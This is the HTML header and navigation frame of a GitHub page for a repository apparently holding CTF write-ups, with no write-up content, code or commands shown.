<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="391126667" data-scoped-search-url="/dyn20/Writeups-CTF/search" data-owner-scoped-search-url="/users/dyn20/search" data-unscoped-search-url="/search" action="/dyn20/Writeups-CTF/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="8WfoFPliaKeXv9hUxY/3Vy2UzsaVA3zaOpZsYo2Yw66PM0GNpOD1Pp2tTTMs8rFCZ8wetoX6CJFPIsd+fJ0uMg==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> dyn20 </span> <span>/</span> Writeups-CTF
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
6 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
2
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/dyn20/Writeups-CTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
